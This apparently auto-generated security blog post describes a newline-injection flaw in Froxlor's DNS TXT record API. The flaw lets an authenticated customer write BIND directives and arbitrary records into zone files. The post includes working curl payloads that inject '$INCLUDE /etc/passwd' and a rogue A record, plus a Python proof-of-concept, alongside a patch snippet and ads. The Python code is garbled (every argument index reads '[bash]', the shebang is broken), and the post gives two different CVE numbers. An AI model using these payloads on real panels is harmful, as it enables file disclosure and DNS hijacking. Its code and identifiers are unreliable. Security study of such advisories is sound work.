Listen to this Post
The `DomainZones.add` API endpoint fails to sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, breaking out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives ($INCLUDE, $GENERATE) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This vulnerability is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but missed patching TXT records. The affected code is in lib/Froxlor/Api/Commands/DomainZones.php, lines 306-308, where the `Dns::encloseTXTContent()` function only adds or removes surrounding quote characters without stripping newlines, carriage returns, or any BIND zone metacharacters. The content flows to the zone file via DnsEntry::__toString(), which concatenates `$this->content` directly into the zone line followed by PHP_EOL. Embedded newlines in the content produce additional lines in the zone file output. The v2.3.5 fix for CVE-2026-30932 added validation functions for LOC, RP, SSHFP, and TLSA types but left TXT records vulnerable. The vulnerability allows a remote user to inject arbitrary DNS records, disclose sensitive information, and cause a denial of service. The issue exists due to improper neutralization of special elements in output used by a downstream component in the `DomainZones.add` API endpoint and BIND zone file generation when processing unsanitized DNS record content for TXT records. The vulnerability is present in Froxlor versions prior to 2.3.5.
DailyCVE Form:
Platform: Froxlor
Version: ≤2.3.4
Vulnerability: DNS Zone
Severity: Critical
date: 2026-03-24
Prediction: 2026-03-24
What Undercode Say:
The following analytics and code snippets demonstrate the vulnerability and its exploitation:
Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"domainname": "testdomain.lab",
"type": "TXT",
"record": "@",
"content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
"ttl": 18000
}
}' \
https://panel.example.com/api.php
Inject arbitrary A record
curl -s -u "API_KEY:API_SECRET" \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"domainname": "testdomain.lab",
"type": "TXT",
"record": "_spf",
"content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
"ttl": 18000
}
}' \
https://panel.example.com/api.php
!/usr/bin/env python3
"""Froxlor <= 2.3.4 TXT Zone Injection (CVE-2026-41234)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()
def api(target, key, secret, cmd, params=None):
return requests.post(f"{target.rstrip('/')}/api.php",
auth=(key, secret), json={"command": cmd, "params": params or {}},
verify=False).json()
target, key, secret, domain = sys.argv[bash], sys.argv[bash], sys.argv[bash], sys.argv[bash]
r = api(target, key, secret, "DomainZones.add", {
"domainname": domain, "type": "TXT", "record": "@",
"content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})
for line in r.get("data", []):
if "$INCLUDE" in str(line):
print(f"Vulnerable: {line}")
Exploit:
An authenticated customer with DNS editing enabled can exploit the unsanitized TXT record content by injecting newline characters, breaking out of the record line in the generated BIND zone file. This allows injection of arbitrary BIND directives, such as $INCLUDE /etc/passwd, leading to information disclosure. Additionally, injection of arbitrary DNS records like A, MX, or CNAME can redirect subdomains to attacker-controlled IPs, intercept email, or cause DNS service disruption. The exploit can be performed via the API or the web UI by intercepting and modifying the `dns_content` parameter in a POST request.
Protection:
Upgrade to Froxlor version 2.3.5 or later. If immediate upgrade is not possible, manually patch the code in `lib/Froxlor/Api/Commands/DomainZones.php` to strip newlines and BIND metacharacters from TXT content. Example fix:
} elseif ($type == 'TXT' && !empty($content)) {
$content = str_replace(["\n", "\r", "\t"], '', $content);
$content = Dns::encloseTXTContent($content);
}
Impact:
- Information Disclosure: `$INCLUDE` directive can read arbitrary world-readable files (e.g.,
/etc/passwd), exposing sensitive data. - DNS Record Injection: Injection of A, MX, CNAME records can redirect traffic, intercept email, or enable subdomain takeover.
- DNS Service Disruption: Malformed zone content can cause BIND to reject the zone, leading to DNS outages; `$GENERATE` directives can amplify the attack.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
